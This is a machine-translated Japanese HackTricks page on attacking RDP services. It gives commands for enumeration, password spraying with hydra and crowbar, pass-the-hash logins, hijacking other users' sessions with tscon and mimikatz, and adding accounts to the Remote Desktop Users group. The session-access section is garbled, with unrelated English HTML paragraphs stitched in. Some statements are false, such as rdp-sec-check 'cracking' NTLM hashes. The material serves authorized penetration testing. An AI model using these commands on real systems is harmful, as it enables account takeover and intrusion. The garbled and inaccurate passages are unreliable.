hacktricks/network-services-pentesting/pentesting-rdp.md

204 lines
14 KiB
Markdown
Raw Normal View History

2023-07-07 23:42:27 +00:00
# 3389 - RDPのペンテスト
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
2022-04-28 16:01:33 +00:00
</details>
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
{% embed url="https://www.dragonjarcon.org/" %}
2023-07-07 23:42:27 +00:00
## 基本情報
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
**リモートデスクトップ**プロトコル(**RDP**は、Microsoftが開発したプロプライエタリなプロトコルで、ユーザーにネットワーク接続を介して別のコンピュータに接続するためのグラフィカルインターフェースを提供します。ユーザーはこの目的のために**RDP**クライアントソフトウェアを使用し、他のコンピュータは**RDP**サーバーソフトウェアを実行する必要があります([ここから](https://en.wikipedia.org/wiki/Remote\_Desktop\_Protocol))。
2023-07-07 23:42:27 +00:00
**デフォルトポート:** 3389
2022-05-01 13:25:53 +00:00
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
2023-07-07 23:42:27 +00:00
## 列挙
2023-07-07 23:42:27 +00:00
### 自動的な方法
2022-10-03 20:20:19 +00:00
2023-07-07 23:42:27 +00:00
```bash
nmap -p 3389 --script rdp-enum-encryption <target>
```
2023-07-07 23:42:27 +00:00
このコマンドは、3389ポートで実行されているRDPサービスの暗号化設定を列挙します。
```bash
2022-10-03 20:20:19 +00:00
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
```
2023-07-07 23:42:27 +00:00
利用可能な暗号化とDoSの脆弱性サービスにDoSを引き起こさずにをチェックし、NTLM Windows情報バージョンを取得します。
2023-07-07 23:42:27 +00:00
### [ブルートフォース](../generic-methodologies-and-resources/brute-force.md#rdp)
2023-07-07 23:42:27 +00:00
**注意してください、アカウントがロックされる可能性があります**
2023-07-07 23:42:27 +00:00
### **パスワードスプレー**
2023-07-07 23:42:27 +00:00
**注意してください、アカウントがロックされる可能性があります**
```bash
2022-10-03 20:20:19 +00:00
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
2023-07-07 23:42:27 +00:00
### 既知の資格情報/ハッシュで接続する
2023-07-07 23:42:27 +00:00
To connect with known credentials/hash, you can use the following methods:
2023-07-07 23:42:27 +00:00
1. **Username and Password**: If you have the username and password for the RDP service, you can use them to authenticate and establish a connection. Use a Remote Desktop Client to connect to the target system and provide the correct credentials.
2. **NTLM Hash**: If you have obtained the NTLM hash of a user's password, you can use it to authenticate and connect to the RDP service. Tools like `rdp-sec-check` or `rdp-sec-check2` can be used to perform offline cracking of the NTLM hash.
3. **Pass-the-Hash**: If you have obtained the NTLM hash of a user's password, you can use it to perform a pass-the-hash attack. This involves passing the hash instead of the actual password during the authentication process. Tools like `mimikatz` can be used to perform pass-the-hash attacks.
Remember to use these methods only in authorized and legal scenarios, such as during penetration testing engagements or with proper consent.
```bash
2022-10-03 20:20:19 +00:00
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```
2023-07-07 23:42:27 +00:00
### 既知の資格情報をRDPサービスに対してチェックする
2023-07-07 23:42:27 +00:00
rdp\_check.pyはimpacketから提供されており、RDPサービスに対して特定の資格情報が有効かどうかをチェックすることができます。
```bash
2022-10-03 20:20:19 +00:00
rdp_check <domain>/<name>:<password>@<IP>
```
2023-07-07 23:42:27 +00:00
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
2023-07-07 23:42:27 +00:00
[**DragonJAR Security Conferenceは国際的なサイバーセキュリティイベント**](https://www.dragonjarcon.org/)で、2023年9月7日から8日までコロンビアのボゴタで開催されます。このイベントは、スペイン語で最新の研究が発表される技術的な内容のイベントであり、世界中のハッカーや研究者を惹きつけています。
以下のリンクから今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく!:
2023-07-07 23:42:27 +00:00
{% embed url="https://www.dragonjarcon.org/" %}
2023-07-07 23:42:27 +00:00
## **攻撃**
2023-07-07 23:42:27 +00:00
### セッションの盗み出し
2023-07-07 23:42:27 +00:00
**SYSTEM権限**を持つと、オーナーのパスワードを知る必要なく、**任意のユーザーの開いているRDPセッションにアクセス**することができます。
2023-07-07 23:42:27 +00:00
**開いているセッションを取得する:**
```
query user
```
**選択されたセッションへのアクセス**
2023-07-07 23:42:27 +00:00
```html
<p>Once you have identified a target system with RDP enabled, the next step is to gain access to a valid session on that system. There are several techniques that can be used to achieve this:</p>
```
2022-10-03 20:20:19 +00:00
2023-07-07 23:42:27 +00:00
```html
<p>RDP Cracking: This involves attempting to crack the password of a valid user account on the target system. This can be done using tools like Hydra or Medusa, which can perform brute-force or dictionary attacks.</p>
```
2023-07-07 23:42:27 +00:00
```html
<p>Session Hijacking: This technique involves intercepting an existing RDP session between a client and the target system. By capturing the session ID and session cookie, an attacker can hijack the session and gain unauthorized access.</p>
```
2023-07-07 23:42:27 +00:00
```html
<p>Man-in-the-Middle (MitM) Attack: In this attack, the attacker positions themselves between the client and the target system, intercepting and manipulating the RDP traffic. This allows the attacker to capture credentials or perform other malicious activities.</p>
2022-05-01 13:25:53 +00:00
```
2023-07-07 23:42:27 +00:00
```html
<p>Exploiting Vulnerabilities: If there are known vulnerabilities in the RDP implementation or the target system, an attacker can exploit these vulnerabilities to gain unauthorized access to a session.</p>
```
2023-07-07 23:42:27 +00:00
```html
<p>Once access to a valid session is obtained, the attacker can perform various actions, such as executing commands, transferring files, or even taking full control of the target system.</p>
```
2023-07-07 23:42:27 +00:00
```html
<p>It is important to note that gaining unauthorized access to someone else's RDP session is illegal and unethical. These techniques should only be used for legitimate purposes, such as penetration testing or authorized security assessments.</p>
```
```bash
tscon <ID> /dest:<SESSIONNAME>
```
2023-07-07 23:42:27 +00:00
今、選択したRDPセッションの中に入り、Windowsのツールと機能のみを使用してユーザーになりすますことができます。
2023-07-07 23:42:27 +00:00
**重要**: アクティブなRDPセッションにアクセスすると、それを使用していたユーザーがログアウトされます。
2023-07-07 23:42:27 +00:00
プロセスのダンプからパスワードを取得することもできますが、この方法ははるかに速く、ユーザーの仮想デスクトップと対話することができますパスワードはディスクに保存されず、メモ帳に表示され、他のマシンで開かれた他のRDPセッションなど
2022-05-01 13:25:53 +00:00
#### **Mimikatz**
2023-07-07 23:42:27 +00:00
また、mimikatzを使用してこれを行うこともできます
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
2022-10-03 20:20:19 +00:00
### Sticky-keys & Utilman
2023-07-07 23:42:27 +00:00
このテクニックを**stickykeys**または**utilman**と組み合わせることで、いつでも管理者のCMDとRDPセッションにアクセスできます。
2023-07-07 23:42:27 +00:00
すでにこれらのテクニックのいずれかでバックドアが設定されたRDPを検索するには、次のリンクを使用してください[https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
2023-07-07 23:42:27 +00:00
### RDPプロセスへのインジェクション
2022-10-03 20:20:19 +00:00
2023-07-07 23:42:27 +00:00
異なるドメインからのユーザーまたは**より高い特権を持つユーザーがRDP経由で**あなたが管理者であるPCにログインした場合、彼の**RDPセッションプロセス**にビーコンをインジェクトして彼として行動することができます:
2022-08-16 00:18:24 +00:00
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
### RDPグループへのユーザーの追加
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
2023-07-07 23:42:27 +00:00
## シャドウ攻撃
2023-07-07 23:42:27 +00:00
**AutoRDPwn**は、主にMicrosoft Windowsコンピュータ上での**シャドウ**攻撃を自動化するために設計されたPowerShellで作成されたポストエクスプロイテーションフレームワークです。この脆弱性Microsoftによって機能としてリストされていますにより、リモート攻撃者は被害者のデスクトップを彼の同意なしに表示し、さらにオペレーティングシステム自体のネイティブツールを使用して必要に応じて制御することができます。
2022-10-03 20:20:19 +00:00
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
2023-07-07 23:42:27 +00:00
## HackTricks自動コマンド
2022-05-01 13:25:53 +00:00
```
2021-08-12 13:26:30 +00:00
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
2021-08-15 17:55:52 +00:00
Entry_1:
2023-07-07 23:42:27 +00:00
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software
2021-08-15 17:55:52 +00:00
2023-07-07 23:42:27 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-rdp
2021-08-15 17:55:52 +00:00
Entry_2:
2023-07-07 23:42:27 +00:00
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
2021-08-12 13:26:30 +00:00
```
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
2023-07-07 23:42:27 +00:00
[**DragonJAR Security Conferenceは国際的なサイバーセキュリティイベント**](https://www.dragonjarcon.org/)で、2023年9月7日から8日までコロンビアのボゴタで開催されます。このイベントは、スペイン語で最新の研究が発表される技術的な内容の高いイベントであり、世界中のハッカーや研究者を惹きつけています。
以下のリンクから今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく!:
{% embed url="https://www.dragonjarcon.org/" %}
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝したいですか** または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたり**したいですか? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をご覧ください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
2022-04-28 16:01:33 +00:00
</details>